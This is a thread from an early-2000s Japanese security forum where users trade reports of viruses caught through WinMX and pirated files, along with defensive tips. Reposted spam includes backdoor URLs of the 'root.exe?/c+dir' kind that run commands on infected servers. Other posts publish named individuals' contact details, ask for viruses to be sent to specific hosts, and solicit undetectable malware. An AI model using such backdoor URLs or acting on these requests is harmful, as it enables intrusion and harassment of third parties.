>>467
それも怖いなぁ・・・
MPEGを再生すらしていないのに勝手に実行？

＞『舞』を解凍しますというダイアログが急に出たと思ったら

この後、イエスを押したんですか？
それとも問答無用で開始？

>>468さんへ
何も実行した覚えはなく・･･
ＭＸでダウソしている以外は、という意味です。
ＤＬ中ということもあり、
ハッキングではないかとも考えたのですが…

>>469さんへ

解凍しますのあとは問答無用で勝手に開始されました。
マウスも動かなくなり、恐ろしい速さで破壊の轟音が…
強制終了をしようとしても破壊に対する処理の方が先で
受け付けてくれなかったですね…
『舞』なんて漢字が出てくるのは日本産だからかな。
mai_004110というようなアイコンが死ぬほど増えていきました。

>>470
始まったらすぐにリセットボタンを押しちゃえば、被害が抑えられますよ。


うーんしかし、かなり高度な手でやられたような感じもしますね。

＞470
＞『舞』という名のアイコンが無数に増えていき
＞すべてのファイルが１バイトとなっておりめちゃめちゃに壊れておりました

この辺りから察するにここで語られてる33バイト
ウイルスでは無いような気もします。
漢字で「舞」ということは国産かﾁｭﾝ産でしょうか？

もしかして33バイトが進化したんですかね？
だとしたら恐い事です。

ハックされたんじゃないの？

こーゆーのって、ｱﾝﾁｳｲﾙｽｿﾌﾄを入れてても防げないのかな？

ハックより時限式の方が可能性は高くない？

聞いてるとかなり怖いのでも、もせオンリーで逝こう・・・・
時限式って防ぐことできるのか？

まぢだとしたら時限式かも
証拠が残ってないのがイタイ
33バイトのヤツは、ウィルスそのものを大事に持ってたヤツがこのスレにいたから
しっかりした情報が入ってきたけど、
>>467のは、これじゃああまりにもわからないことが多すぎる
なにに気をつけたらいいのかさえあやふやだし

「メヂアプレイヤーの更新ダイアログ」ってのはどこかで出てきたな

>>1のことだった「更新ダイアログ」
すんまそ、大ボケだ

みなさま、ありがとうございました。

>>471さんへ
リセットボタンですか…ありがとうございます。
高度な手･･･ですね。

>>472さんへ
漢字のアイコンでした。
漢字を使う国というのは限られているけれど…
舞（Mai）という読み方をそのままファイル名にしていたので
やはり日本産でしょうか････本当に不気味でした。

>>473さんへ
ハック…P2Pだからありえるかなとも思っておりますが
こんなに破壊的なことが出来るのでしょうか・・・
横で見てても怖かったです。

>>474さんへ
アンチウイルスソフトは
ノートンのが起動しておりました。弾いてはもらえませんでした。
（IPAには申告済み･･
　　MXとは書けないのでWebよりフリーをDLと書いた。）

>>476さんへ
今回もせ動画も同時DL中でしたので
旦那と違ってもせオンリーの私としてはかなりショックでした。
あまりないバイト数のもせも注意しようと思います。

>>475さんへ
時限式というのもあるのですか…
本当に爆弾ですよね〜〜〜！(x_x;）

>>477さんへ
何に気をつけたらいいかあやふや…
そうですね。
ノートンアンチウイルスを入れて監視しつつ
MXでDLしている途中に自動で起動されて破壊されたので
このファイル名とMXに気をつけてねとしか言いようがありませんが
すべて事実ですし激しく鬱です…
Codec集とモー娘の『ピース』の動画です。
このどちらかに関係していると思います。

>>478･479さんへ
(^-^)なんだか、和みました。
破壊された領域の広さに殺伐としてましたので…(x_x;）

>>480
時限式と考えると、他に思い当たる節はありませんか？
今までに、一度も割れソフトをインストールしたり実行したりしていませんか？

>>481さんへ
実行、してますね…
時限式と考えると心当たりはあります。
アンチウイルスでは弾かれなかっただけでしょうか。
最近はDLしてなかったようですが…
最近インストしたのはVisualBasicくらいだったかもしれません。

でもウイルスのデータベースを拝見しても
『舞』というアイコン増殖型のウイルスはひっかってこなかったです。
何かの亜種か新種かもしれないですね。
ありがとうございます。

>>480
きつ言い方かもしれんが、>>480 の思い込みばっかりで
全然肝心な点がわからない。
Codec集かモー娘の『ピース』の動画が原因と言い切れる根拠は？
もうちょっと原因について検証してほしかった。

ちなみにその「舞」はここの >>1 とは違うウィルスだと思う。
ちゃんとこのスレ最初から読めと言いたい。小１時間言い続けたい。

とりあえず拾ったモノを思い出せる限り書いてよ
VisualBasicはどこで拾ったのかとか
ほかに割れ物やってたとか

原因がわかれば、防衛策も練ることができるし
初めてウィルスにやられて、へこんでるだろうし、動転してるだろうけど
ここは冷静になって、思い出して欲しいな

なんか動画が原因じゃなさそうな感じだな。

OSをマルチブートしている場合なら、
データが破壊されてるな、と思った瞬間にPCを強制終了させて、
別のOSを立ち上げてウイルスを除去すれば被害は少なくなるのでは、
と思うのですが、いかがでしょうか。

>>486
うん、別にあたりまえの話だと思うよ。
強制終了よりは、リセットボタンのほうがいいけどね。

338 名前：心得をよく読みましょう ：01/10/14 22:17 ID:5r0xorkP
ひろゆきもそろそろ管理人としての姿勢を見直すべき
珍走団がひろゆきに土下座をさせたのは、荒らしの責任を取らせたのではなく
あくまでも、ひろゆきの電話での態度について落とし前をつけたまで
日本生命やＩＮＳＩのように、安全を確信できる相手には、イキガッテみて、
珍走団のように理屈の通じない相手には遜って土下座までするようでは
あまりにもカッコワルイ

ただファイルDLしただけで感染するウイルスって技術的に出来るの？
NimdaとかはIEのセキュリティホールをついたヤツだよね？
WinMXにセキュリティホールがあるのか？

ためしにMXで検索したら、見つかったぞ

[PV]モーニング娘。　ザ☆ピース！　(MPEG2).mpg 184616964　（ユーザー名省略）　T1 〜

さすがに怖くて手がだせん

>>467
スキンを変更したWindowsMediaPlayer7を使っている。Y/N?

>>467
　マジっぽいネタはやめろや

>>483
>>ちなみにその「舞」はここの >>1 とは違うウィルスだと思う。
>>ちゃんとこのスレ最初から読めと言いたい。小１時間言い続けたい。

＞ここに書いてあるような症状と「似ている」のですが････
＞同じ思いをされた方がもしいらっしゃれば。

あんたこそ揚げ足取るならちゃんと読め。
「似ているのですが」と最初にいってるだろうに。
思い込みはどっちだろうね。ｶｺﾜﾙ｡

>>491さんへ
スキンは変更なしです。
それって関係有るのでしょうか・・・？

>>492
ネタかどうかはあんたに決められることじゃない。
煽りって不細工。うましかうましか。

その時DLしていたものを原因として考えるなら
この動画とCodec集かもしれないね。
しかしほかに原因があるとするならば（時限式を含む）
枝葉末節挙げるとキリが無いです。
ただ、こういう症状のウイルスは存在するのかと思い
ここへ来ました。
心ある暖かな人もいればいろんな人もいますね。
同じ思いをされたときに初めて揶揄の鬱陶しさがわかるんでしょうね。
もう二度とこないと思います。
ありがとうございました。

うんこ

>>493
というか、その程度の煽りにいちいち腹を立てちゃいかんよ。
２ｃｈ経験はあまり無いですか？
あんなのに反応するなんて、ある意味驚いた。

アホは気にしないで、話を続けましょうよ。

でもまあこれだけの情報じゃ気をつけようもないし
他に似たような報告もないわけだからどうにもならないわな。

>>493 は2chもパソコンも初心者か？
MXでDL中(DL後でなく)のファイルが勝手に実行される状況ってあるのか？
もうちょっとよく考えてから書いてくれ。

>>497
いやだから、ハックもしくは時限式、って話しになってきているじゃん。
お前こそちゃんと流れを見て書き込め。

ハックもしくは時限式、って話しになってきているつーことは
原因不明でこの話は終了？

61.125.112.91　zaq3d7d705b.zaq.ne.jp

>>499
まぁ後はくるりさんが時限式の心当たりのソフトを挙げてくれればいいんだけど、
もう来ないみたいだから終了かな？

>>493
http://news.zdnet.co.uk/story/0,,t269-s2083755,00.html

493 日本語訳
http://www.excite.co.jp/world/url/body/?wb_url=http%3A%2F%2Fnews.zdnet.co.uk%2Fstory%2F0%2C%2Ct269-s2083755%2C00.html&submit=%83E%83F%83u%83y%81%5B%83W%96%7C%96%F3&wb_lp=ENJA&wb_dis=2&wb_co=excitejapan

493じゃなくて502だろ。お間抜けさん。

「皮膚」の連発にﾜﾗﾀ

http://sasurai.gaiax.com/home/devilman
ｺｲﾂﾑｶﾂｸ!!!
ｵﾈｶﾞｲﾀﾞｶﾗ､ﾀﾞﾚｶｳｨﾙｽｵｸｯﾃ!!!

>>506
っていうか、gaiax自体がむかつく。

>>506
なんか、「ウンコ」って名前のカメ泳いでなかった？？

関係無いかもしれんが、念のため。
さっき「Mr Moonlight」 をＭＸで落としたが他のとサイズが微妙に違っていた事もあり、
「参照」すると「共有０」・・・。あれっ、俺コイツを何処から落としたんだ？
「ユーザー情報」もずーつと待っていても、でてこないし・・・。
おまけに「接続速度Ｔ１」・・・。
ＭＸやっている最中にノートンをアップデートしたが、「定義の更新」じゃなくて、「ノートンアンチウイルス
自体の更新」（システム自体の更新か？）なので、再起動しないと更新完了しない。
仕方なく「削除」した。（泣）
他にDL中が５個程+順番待ちが２０個程あったし、もったいなかった、仕方なし！

WINMXが使えないよ！！

動画は原因じゃないと思うよ…
推測だから、断言はできないけど
もせとかにまで気を回し始めたらきりがないよ

> あんたこそ揚げ足取るならちゃんと読め。
> 「似ているのですが」と最初にいってるだろうに。
> 思い込みはどっちだろうね。ｶｺﾜﾙ｡
>

煽られたくらいで↑この部分だけ妙に厨房化してるのが
ひっかかる。
むしろ2ちゃんに染まっりきったﾔｼのネタ臭がするぞ

漏れもネタな気がしてきた。
今のところmpegから感染するウィルスって見つかってないよね？

MXで動画とか落としてるやつをびびらせようとしてるネタ？

>>512
いや、ネタじゃないでしょう。あの切れ方は間違いなく天然。
ネタだったらあんなところで切れないで、
もっともらしいことをずっと言いつづけるでしょう。

>>514
だから「動画が原因説」はもうとっくに外れているんだって。
おそらく、時限式でしょう。

厨房でよくわからんが､htmlなのに拡張子をmpgにするとか
mpgとhtmlファイルをくっつけて拡張子をmpgにしておいた場合､
ウイルス感染させることは出来ないんすか？

>>515
mpgデータに不正なヘッダ情報仕込んで、バッファｵｰﾊﾞﾌﾛ起こせさる方法だったらありえるかもね。
ただ、この場合は実行するプログラムに大きく依存するし、mpgローダは結構研究され尽くしてい
るから、そのようなｵｰﾊﾞﾌﾛを起こすような間抜けなコードを埋め込まないと思われ。

つーか、それができたら今ごろ大騒ぎだって！

あげ

て優香、ザマーミロ（藁

もうこないといった奴は必ずｺｿｰﾘと見に来ている説。

違法行為してるヤツがギャーギャー騒ぐな。くたばれ。

>>522
同意まんこ

誰がギャーギャー騒いでるって？
ちゃんとこのスレ読んでねえだろ？初めて来ただろ？
流れがわかってねえよボケ。

>>524
>誰がギャーギャー騒いでるって？

オマエダＹＯ

>>524
そうやってダボハゼみたいに食いつくから
こういう類のウイルスにズタズタにされちゃうんじゃないの？（藁

優良スレ　age

優良ウイルス　age

age

さて、そろそろ誰かリスト化ｷﾎﾞﾝ

ギャ-ギャ-

MXでウイルス配布面白いな〜
著作権侵害逝って良し

割れはイカンと思うが、こういう奴はキモイ

俺も W32.Whiter.Trojan にやられたわ。

>>534
キモイっていうか、ウソがバレバレだから痛い。寒い。
配布なんてしてないくせにな。

実験の為に拾ってインストしてみた、ってことで
データ飛んだら被害届出せば。なんなら、ほんとに
警察なり民間団体の立会いでやればいいっしょ。

トロイばら撒いてる奴一人くらい､ほんとに生贄にしないと。
オレはＭＸやってないからどうでもいいが。

>>537
何が「実験」だよ。頭おかしいだろ、お前？
くだばれ。

>>538
お前、意味わかって反論してるか？
トロイって何か知ってるか？（ｗ

トロイをインストか…。素晴らしい！w

木馬の中に兵隊が隠れてたなんて、結構無茶な話だネw

>>539
そういうオマエのほうが意味分かってんのか？（ｗ

トロイの木馬（Trojan Horse）

　便利なソフトウェアに見せかけて、ユーザに被害を与える不正なプログラムです。
　感染機能は持っていませんので、感染増殖することはありません。トロイの木馬の内部に
　隠していたウイルスをパソコンに組み込んだり、パソコン内部の秘密のファイルをインターネット
　上に送信してしまったり、ファイルやディスク内容を破壊するなど、さまざまな被害があります。

http://www.ipa.go.jp/security/virus/beginner/dic/dic_sub.html#trojan
↑ここ見て勉強しろや（ｗ

すっかり駄スレになってんな。

>>542
何当たり前の事を書いてるんだ？？

538の書き込みの意味が全然わからん。537の意味を汲み取っているとは思えん。

お前は、トロイをばら撒いている本人って事か？
それなら納得は行くが。

>>543
折れには539の意味が全然わからん。

210.150.115.232

>>542
恥ずかしいレスしてんな・・
今更トロイの意味なんて貼るなよ・・・(;´Д｀)

>>542
セキュ板でこのレス・・・
ﾋﾞｸｰﾘだ

安っすい「割れ試しようPC」一台買ったほうが早いような気がしてきたYO

VirtualPC for windowsなんてどう？

>>549
あのさ、このスレちゃんと読んだ？激しくがいしゅつ。

Cmtud12DS74.chb.mesh.ad.jp
M110189.ppp.dion.ne.jp
こいつらを頃して下さい。ウィルスで。
おねがいします、このとおりです。

>>551
C型肝炎ウィルスでも送り込めばよろしいのでしょうか？

最近は、被害報告ないですね〜。
Whiter自体少なくなったのかな？

結局、もせオンリーだったら安全なの？

>>554
「確率は低くなる」としか言えない
「絶対大丈夫」と言い切れないのがウィルスだからねえ

>>553
このスレのオカゲかと。。。

やられた……33バイトづつ細切れに……

サイズ　　　　　　　533 MB (558,895,426 バイト)
ディスク上のサイズ　533 MB (558,923,776 バイト)
Windows_XP_Pro_RC2_Whistler_2526Japanese(要ＩＭ).zip
ウイルス検出できんかった。　ｸｿｯ!!!

即出だったらｺﾞﾒﾝ

WindowsNTを使ってるんですが
これってひょっとしてｳｨﾙｽに強いんですかねぇ。

>>558
Administrator権限で使ってたら9Xと変わらん。

>>557
このスレがあるのに今更引っかかるなんて・・・・
再起動前にレジストリ確認しなかったの？

>>557
＞やられた……33バイトづつ細切れに……

ちなみに、33バイトづつ細切れに、って間違いだよ。
単にファイルサイズを３３バイトにするだけ。
別に細切れになっているわけじゃない。

これに関しては１も間違ってるんだけどね。

>>560
今度からそうする。ｱﾘｶﾞﾄｳ

>>561
そういうことだったのですか。こちらも知識をｱﾘｶﾞﾄｳ

33バイトにされたのが所々だけだったのが不幸中の幸いだった。systemは大丈夫そう…
（でも、ﾃﾞｽｸﾄｯﾌﾟにあるファイル全部33バイトにされた。…鬱）

ウィルスウィルスって一体そんなに怖いのか？
なんか見えない世界で､おたくたちが盛り上がってるだけのようなきがする｡

>>563みたい奴がNimdaにやられるんだろうな…

>>563
そりゃ君、淋病罹ったこと無いからそう言えるんだよ。。。
い、いや、漏れの友達、スンゴイ痛いって。。
も、漏れぢゃ無い。

>>563
見えてないのはお前だけだよ。
次に再起動したら、お前のマシンのHDDが全部消えてたらどうする？
ウイルスとはそういうものだよ。当たってみて初めて気が付く。
経験の少ないお前には想像つかないだろうけど。

未知のウイルスが存在？
http://www.ebcvg.com/vx_exe.html

http://www.ebcvg.com/links.html

IRC.WORM W32.HLLP.Eter.8704 VBS.Rewind.A@mm
Hybris Troj W32.XTC.Worm などがある。

今さら？　ＣｏｄｅＲｅｄ 　Ｎｉｍｄａ？
bleah_bla
http://home10.inet.tele.dk/scripts/root.exe?/c+dir+"c:\
http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=901313&PA=207766&BAN=1

水泥棒「「菊池記念館」」隣人を脅迫!!!!!
http://www.pref.miyazaki.jp/shoukou/kankou/sight/park/hall.htm
http://www.miyanichi.net/benri/museum/hakubutu.html
http://www.miya-shoko.or.jp/nishimera/chiiki/kankou/kikuchi.htm
隣人が設置した水路を横取りしてすべての水を引き込んでいる。
養殖するために大量の水が必要とふざけたことを言いやがる。
養殖で儲けたものは未申告。

em5000.com,optinglobal.comはｽﾊﾟﾏｰ
<A HREF="[email protected]">[email protected]</A>
<A HREF="[email protected]">[email protected]</A>
http://www.optinglobal.com/cgi-bin/[email protected]
http://www.optinglobal.com/cgi-bin/[email protected]

To unsubscribe click here or go to http://www.em5000.com/unsub.php?client=jab1
and enter your email address ( [email protected] )

P.S. Please do not share this number with anyone!
It’s a reserved number that’s meant for you, friend.
Dial 1-800-748-3530. （スパムメールの内容）

>>567
未知というか、単にパターンファイルに登録されて無いだけの話。
別に珍しい事ぢゃ無いよ。。。
単にネットで出回って無いだけの話。スクープでもなんでもない。
直リン晒すの止めれ。ウゼーぞ。

違法ソフトで感染してる奴はヴァカだね

>>569
今更何言ってるんだオマエは。
このスレの内容知らないだろ？

>>570
ここは>>1がＭＸの違法ソフトでやられたスレだろ

>>571
スレの流れを読めやボケ。
違法ソフトが悪い、なんてことは前提の上で話してるんだよ。
そんな当然なこと書いたって煽りにもなんねえよ、って言ってんだよ。

つまりお前の書き込みは　「浮いてる」　の。

adobeにリンク張っとこ
http://www.adobe.co.jp/

ビンラディン.doc.pifってウイルス？

>>574
実行すると航空機が落ちてきます。

×違法ソフト
○違法コピーソフト

言葉は正確に使いましょう

やっと全部読み終わった。
割れ物がどうのとかは関係無しで、為になったよ。
違法ソフト使ってなくても、危険性はあるよね。

a

http://www.ebcvg.com/vx_exe.html
にはIRC.WORM W32.HLLP.Eter.8704 VBS.Rewind.A@mm
Hybris Troj W32.XTC.Worm などがある。


今さら？　ＣｏｄｅＲｅｄ 　Ｎｉｍｄａ？
bleah_bla
http://home10.inet.tele.dk/scripts/root.exe?/c+dir+"c:\
http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=901313&PA=207766&BAN=1

水泥棒「「菊池記念館」」隣人を脅迫!!!!!
http://www.pref.miyazaki.jp/shoukou/kankou/sight/park/hall.htm
http://www.miyanichi.net/benri/museum/hakubutu.html
http://www.miya-shoko.or.jp/nishimera/chiiki/kankou/kikuchi.htm
隣人が設置した水路を横取りしてすべての水を引き込んでいる。
養殖するために大量の水が必要とふざけたことを言いやがる。
養殖で儲けたものは未申告。

em5000.com,optinglobal.comはｽﾊﾟﾏｰ
<A HREF="[email protected]">[email protected]</A>
<A HREF="[email protected]">[email protected]</A>
http://www.optinglobal.com/cgi-bin/[email protected]
http://www.optinglobal.com/cgi-bin/[email protected]

To unsubscribe click here or go to http://www.em5000.com/unsub.php?client=jab1
and enter your email address ( [email protected] )

P.S. Please do not share this number with anyone!
It’s a reserved number that’s meant for you, friend.
Dial 1-800-748-3530. （スパムメールの内容）

だよな

気にすんな。

自分もＭＸやっててヤラレタよ。
もうＭＸ止めるわ。十分美味しい思いしたしな。
しかも感染源がアンチウィルスだし。あはは。
まあ、笑ってくれ・・・・・・・

>>582
ﾜﾗﾀﾖ

で？

win2kでuser1が使用しているときに感染したとして、次回ログオン時に違うユーザ(user2等)
でログオンした場合って発動しない・・・よね？

当然発動するよ

win2kでadministrator権限で使わないほうでいいですか？
しょっちゅういろいろ設定変えるんで、そうしているんですが、
やはりuserのほうがいいんでしょうか・・・

株式会社ネックス、株式会社キャッチネットワークはスパマー
掲示板にしつこく宣伝を書き込むため株式会社ネックス、株式会社キャッチネットワークに対し抗議したが無視。
−−
画質が綺麗 名前:たかし http://211.13.210.40/sv04/adf0040.html
画質が綺麗なのでうなづきました
−−−−−
CodeRed http://211.13.210.40/scripts/root.exe?/c+dir+"c:\
http://www.optinglobal.com/cgi-bin/[email protected]
http://www.optinglobal.com/cgi-bin/[email protected]
<A HREF="[email protected]">[email protected]</A> <A HREF="[email protected]">[email protected]</A>
211.13.210.40
株式会社サイバービジョン (CyberVision Co.,Ltd.) CV-NET [211.13.210.0 <-> 211.13.210.127] 211.13.210.0/25
メディアエクスチェンジ株式会社 (Media EXchange, Inc.) SUBA-200-C07 [サブアロケーション] 211.13.210.0
[運用責任者][技術連絡担当者]
a.[JPNICハンドル]YO2225JP b.[氏名]奥瀬康仁 c.[Last, First]Okuse,Yasuhito
d.[電子メイル] [email protected] f.[組織名] 有限会社ネックス g.[Organization]NEX INC.m.[肩書] 代表取締役
n.[Title] President o.[電話番号] 03-5338-3386 p.[FAX番号]03-5338-3086
y.[通知アドレス] [email protected] 株式会社ネックス http://www.n-ex.net/
発信元
210.236.64.
Network Information: [ネットワーク情報]
a.[IPネットワークアドレス]210.236.64.0-210.236.66.0 f.[組織名] KATCH-NET(株式会社キャッチネットワーク)
p.[ネームサーバ]ns2.ctc.ad.jp p.[ネームサーバ]ns.katch.ne.jp
y.[通知アドレス] [email protected]
[運用責任者]
b.[氏名] 加藤 徳英 d.[電子メイル] [email protected]
f.[組織名] 株式会社キャッチネットワーク o.[電話番号] 0566-27-0315
p.[FAX番号] 0566-27-5551 y.[通知アドレス] [email protected]
http://www.katch.co.jp/

>>586
使い方によるだろうね

＞しょっちゅういろいろ設定変えるんで、そうしているんですが
ならadministratorで使う方がイイでしょ
そのかわり危ないファイルを使わないようにする


アドバイスになってないな…ｽﾏｿ

PhotoShop6.0(j)でやられました。

Zipファイル解凍後Setupファイル実行したら無反応。
ダミーファイルつかまされたと思ってその日は電源断。
あとはおきまりのコースでした。

BearShareで見つけたファイルで、ホストは憶えてないけど接続先に日の丸があったのと
ファイル名に(j)が付いていた事から推測すると、仕込んだのは日本人・・・なのかなぁ？

ちなみにノートン先生見つけてくれなかったよ。

>>589
ざま・・

トロイ入り撒いてる奴って、拾った奴がソフトメーカーに
訴えられる覚悟で被害届出せば、撒いてる奴もソフトメーカーに
訴えられるから結局同罪なんだよね（ｗ

>>591
ソフトメーカーがばら撒いてたりしてね

>>592
確かに。その可能性があるから実際に事件化したらおもろいかも。
昔､シェアウェアソフトの製作者が不正尻入れるとHDをフォーマットだか
ファイルの全削除だったかをするという仕掛けをしたらしいが、それを喰らった
不正ユーザが裁判起して勝ったという事件がなかったっけ？

>>593
ウィングルーブのことか？

スレ全部読んだけどそこまでしてウィルスしこんで共有しては
誰かのHDが逝くことに快感を覚えてる奴ならさ、このスレも読んでるだろうし
今頃ウヒャウヒャ新しいの仕込んでるよ。
何十Gもデータが詰まってるやつならサブマシンもってるだろうし、それで試すしか
ないんじゃないの？

wareやめりゃいいじゃん。

>>594
詳細きぼーん

MXで落としたZIPファイルをノートンアンチウィルスでスキャンすると
「ブートレコード（重要な起動情報が入っている項目）が変わりました。」
と警告されました。
以前の状態にブートレコードを復元しました。
その後ウイルススキャンでは何も引っかかりません。
以前にも同じことがありました。
これって何なんでしょう？

>>598
ウィルスの活動の結果を検出できても
ウィルスの存在は検出できないケースも存在すること

>>598
ありがとうございます。
結局どういった活動をしようとしたのか解りませんが
共有するのは止めておきます。
でもウイルススキャンしようとしただけでも
活動することもあるんですね。

>>597
事件の詳細
ttp://www.forest.impress.co.jp/article/1998/09/16/wingroove.html
ttp://cyberfield.virtualave.net/r002.html

作者のページ
ttp://www.wg7.com/
作者の言い分
ttp://www.wg7.com/wg09fbdocs/

っていうか、WinGroove も、もう過去のことなのか。
被害を受けた私のキズはまだ癒えてないというのに・・・

質問
今連続で別の人からwhatever.exeなるファイルが着ました。
勿論あけませんでした。"
題名some urls i found"
1通目はすぐ削除して気がつかなかったのですが2通目に灰色の
小窓？がでてそこにc;\windows\tempolary internet files\
content Ie5\GXQWHQZ\whatever.exe
とありました（その下に開くか保存かの選択）。
相手のパソコンの中にあるファイルの位置になるのですか？
私のパソコン検索してもwhatever.exeは でてきませんでした。
2人とも同じファイル名と似たような題名でした。

確か一時MSNサイトで見るだけで感染するとかなんとか
あったと思いますがそのたぐいでしょうか？
17時ごろに2通きたのでびっくりしています。

>>601
折れは不正尻でフォーマットはイイと思うが、誤動作はやめてほしいね。

[email protected]
↑こいつからウイルス入りのメールが二通来た、腹が立ったのは本文、「ピース」とローマ字で書いてあった・・・なにが「ピース」なんだ！

>>604
それそれ！同じ！

>>604
送った人は知らないと思う。
多分自動配信じゃないかな？題名に

：-）このスマイルマークありませんでした？

>>604
fromの詐称なんかスキルのうちに入んないし
詐称して無くても当人が被害者の可能性もある

安易にfromのメアドを晒すな

オレはその人に返信しちゃった・・・けど、大丈夫かなぁ・・・

＞607
ｆｒｏｍとは何だ?

晒すな←読めない。

晒すな（さらすな）

＞６０２
これね・・・うちにもきたよにつう
http://www.trendmicro.co.jp/virusinfo/vbc_default3.asp?VName=TROJ%5FALIZ%2EA

腹が立つからメアドを載せたなにが悪い！

TROJ_ALIZ.A
もしかしてウイルスはこれですか？
うちのＰＣ感染してしまいメール送りまくって困ってます。
駆除方法おしえてください

ちなみにメールに添付されてるウイルスは
プロバイダで駆除してあるらしいので届いた
ＰＣには感染しないらしいですが、、、

TROJ_ALIZ.Aに該当するウイルス。
日本語でも英語でもないけど、概要が書いてあるよ。
読める人、読んで。

このページの「I-Worm.Aliz」
http://www.avx.ro/html/latest_submissions.php

ダウソ板見てきたが、なんか動画ファイルにウイルスを仕込むソフト(？)を作成中らしい。
動画見ているだけで、データが…やめてくれ。

>>614
最近はコンビニでもアンチウィルスソフトを売っているところがあります。
もしなかったら、今日はPC切って明日朝一で買いに行きましょう。

>>614
とりあえずウィンドウズスクリプティングホストを削除して
再起動してみては？　VBSワームならとりあえずそれで活動を止め
られるかも。
手順はコントロールパネル→アプリケーションの追加と削除→
Windowsファイルタブ→「アクセサリ」をダブルクリック→
「Windowsスクリプティングホスト」のチェックを外してOK。

>>617
動画なら、被害届出せば？浦動画なら猥褻物頒布罪に
問えるよ。

>>613
誤爆の可能性があるっていう意味

>>619
WINDOWSMEなのですがないです「Windowsスクリプティングホスト」
という項目が・・

>>622
すまそ、MEはよくしらん。

>>622
Meならフォルダ開いて、｢フォルダオプション｣→
｢ファイルタイプ｣→VBSScriptスクリプトファイルを削除じゃダメ？

追加・フォルダオプションの前に、表示をクリックしないとないはず。

ありがとうございました!
ありました。削除しておきました。

>>617
それどこのスレ？

>>626
治まった？

>>627
ねつ造くん？とかいうのがスレのタイトルだったような…
そこの話だと動画なら何にでも仕込めるようにするとかいってた。
ネタかもしれないが。

最近、スレ違いのウイルスの話題が増えてきたな・・・

>>614
TROJ_ALIZ.Aの情報更新されたよ。
http://www.trendmicro.co.jp/virusinfo/vbc_default3.asp?VName=TROJ%5FALIZ%2EA

>>603
誤動作ってのは9割方言い逃れだろ。

あと不正尻だからって即フォーマットは勘弁してほしい。
俺WinGroove正規ユーザだけど
Windows再インストールする時とかに面倒だからって
尻集の尻で済ませちゃうことも結構あるからさー。
それでフォーマットされたらかなわんよ。

｛受信バイト･送信バイトが異常に増えます。｝
http://pc.2ch.net/test/read.cgi/sec/1001161116/l50

これに書いてある動画ウイルスがめっちゃ気になるんですが…。
私も身に覚えがあるんです。「娘。」系の動画で感染した気がするんです。

>>632
折れは再インストール時に面倒だから
自分のシリアル集（不正尻ではないもの）を作って利用してる。

>>632
>Windows再インストールする時とかに面倒だからって
>尻集の尻で済ませちゃうことも結構あるからさー。

普通そんなことしないって・・・
管理能力がゼロだな。 自業自得じゃない？

WinGroove以外のシリアル入力に活用していると思われ

>>635
俺も以前>>634みたいにしてたんだけど
HDDがクラッシュした時に「オレシリアル集」も一緒に消えちゃったのよ。
で、改めて作者に問い合わせるのも面倒だし面倒かけるしっつーことで
ある時期から尻集しか使わなくなった。

>>636
それもある。

一通りよんだ。
おれもMXで落としたCD革命でWhiterにやられた。
興味深くこのスレを読んでいたらヤフオクの取引相手からALIZ入り
メールが送られてきた。
なんだかな〜。
buniroが晒してるメアドは削除依頼ださんでいいのかかな？
ウィルスが自動送信してるだけじゃないの。

>>35
漏れもそこの638以降と同じように
フィルダのみ残して
2chのあらゆるスレをエロ画像みんな消えたときが1回だけあった。
グヌテラやMXインストして試してみたことはあったけど
まともに使ったことはない。
原因ははっきりとはわからないな。

kowai

このウイルスってオンラインスキャンで見つけてくれる？

２２日に届いたメールが、見かけないアドレスで怪しかったので
添付ファイルを一度保存してから、ウイルスチェックしてみて
安全なら見ようと、思ったんですが、保存しようとしたところで
同じファイルがありますと表示されたので、削除しました。
同日「TROJ_ALIZ.A」に注意するようにってメールがあり、
チェックしようとしたメールが、これらしくとても不安です。
今のところ、ファイルは無事ですが、他に何か起こるのでしょうか？

>>624
>>614と>>631見た？
TROJ_ALIZ.Aはファイル消したりはしないんじゃないの。
んで、ウィルススキャンの結果はどうだったのよ？
いきなり「他に何か起こるのでしょうか？」って言ったって
わかる人いないんじゃないの？

トップ　ttp://osaka.cool.ne.jp/mikisukesan/index.html

日記　ttp://osaka.cool.ne.jp/mikisukesan/diary/diary10.html

何がｷﾓいかってのはウケ狙いすぎの日記。
ﾏｼﾞ狙い杉で寒い。
みきすけになんか言ってやって下さい。

>>644
そんなにキモク無いじゃん。
おまえはアクセス数を増やして応援しているのか？

644みてーな依頼ヴァカは正直キモイ

怖いので、Virtual PCをいれようと思い、
安全だといわれる以下のサイズのものを 3個落としてみた。
Connecti Virtual PC 4.1 (Serialあり) 21,982,327
ところが MD5にかけてみると全部値が違うんじゃ〜

>>647
で？

さようならMX

基本的にZIPにはウイルスは入ってない事の方が多い。
しかし、エロゲーは欲しいぞ

>>598
君はダメな人間だな

皆様がお持ちのウイルスを送ってください！
収集用に設けたメアドですから、暴発の心配はありません.
ネットカフェのPCで試しますので、送って下さる時はウイルスチェッカーに検出されないような強力なものをお願いします。

ひでえな

>>652
ここはセキュ板だ！ｺﾞﾙｧ!
最近、この板も落ちたものだ。

ttp://member.nifty.ne.jp/turukame/

今まで使ってたＰＣを売りに出すのですが
ＨＤに残ってる個人情報やエロ画像を他人に見られると
恥ずかしいので削除したいのですが初期化しても消えないので
専用のソフトが必要とのことですが
ヨドバシ.com等を見てもどのカテゴリのソフトなのか解からなくて
見つけ出せないでいます。
またそのソフトってのはフリーウェアには無いのでしょうか？
そして僕はスレチガイデしょうか。
どこにいけばこの話題があるのか見つけられずに
検索してたどり着いたのがココでした。

>>656
PGPのdisk wipe機能使ったら?
freeだよ?
軍用レベルでwipeすりゃまず安心だろ。

http://www.pgpi.org/

>>656
>そして僕はスレチガイデしょうか。
ああ、そうだな。
おれも今きづいた。
スマヌ

>657
ありがとうございます。
せっかく教えていただいたのですが英語なんですね・・・
難しいです。
データ削除することをdisk wipeと言うんですかねー。

>>657-659
そんなむつかしいことをするより、フリーソフトで探したらいくらでもあるのに。

>660
できればそのフリーウェア教えていただけませんでしょうか。
探してはみたのですが、よくわかりませんでした。

金払うなら、ターミネータｰアルティメットでも買うんだな。
日本語だ。

test

FinalData使ってみて、フォーマットしても
これだけデータが残ってるんだなあ、と実感した。
安い中古パソコンとか中古HD買って覗いてみたくなったよ

>664
コワ！

＞＞664

やったことあるよ。
自動車中古販売のお店で使用していたようで、
顧客管理しているTheCardのファイルを吸い出した。
あと、お金関係のエクセルファイルとか。

まぁ、面白いものが入っている可能性はほとんど無いだろうな。

８４６のものなのですが、インストールもできないのです。
メールも同様、インターネット以外は何もできません。

SirC32exeがみつかりません。
